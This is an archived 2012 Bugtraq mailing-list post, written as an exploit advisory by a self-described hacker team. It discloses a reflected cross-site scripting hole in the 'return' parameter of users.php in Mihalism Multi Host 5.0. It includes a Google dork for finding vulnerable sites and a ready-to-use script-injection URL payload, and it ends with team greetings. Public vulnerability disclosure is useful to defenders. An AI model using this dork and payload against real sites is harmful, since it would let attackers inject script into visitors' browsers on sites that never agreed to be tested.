lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat, 25 Aug 2012 18:28:44 GMT From: explo21ter@...il.com To: bugtraq@...urityfocus.com Subject: Exploit Title: Mihalism Multi Host v 5.0 ####################################################### # Exploit Title: Mihalism Multi Host v 5.0 # Google Dork: intext:"powered by Mihalism Multi Host" # Date: 2012/8/25 # Discovered By : Explo!ter # Software Link: http://www.mihalismscript.com/ # Version: 5.0 # Tested on: Linux # Contact : Emperor-team.org # Spt to : Stokke ######################################################## Details : ++++++++++++++++++++++++++ the vulnerable file is "users.php" XSS ++++++++++++++++++++++++++++ +++ http://Target/users.php?act=register&return=XSS Codes EX : http://Target/users.php?act=register&return=/><sCrIpT>alert('Explo!ter')</sCrIpT> ++++++++++++++++++++++++++++++++++ we are : MЯ.Ŧ@ЯÐłЛ - adonis - KING-O - STOKKE - Mr.Treh - sil3nt - ™♥iR-HackeR♥™ - EXPLO!TER - hidden dagger - HOSSEIN7 - Ali_D3C0D3R - ɱαяʎαɱʝ0ღʝ0ღ And All Member
Powered by blists - more mailing lists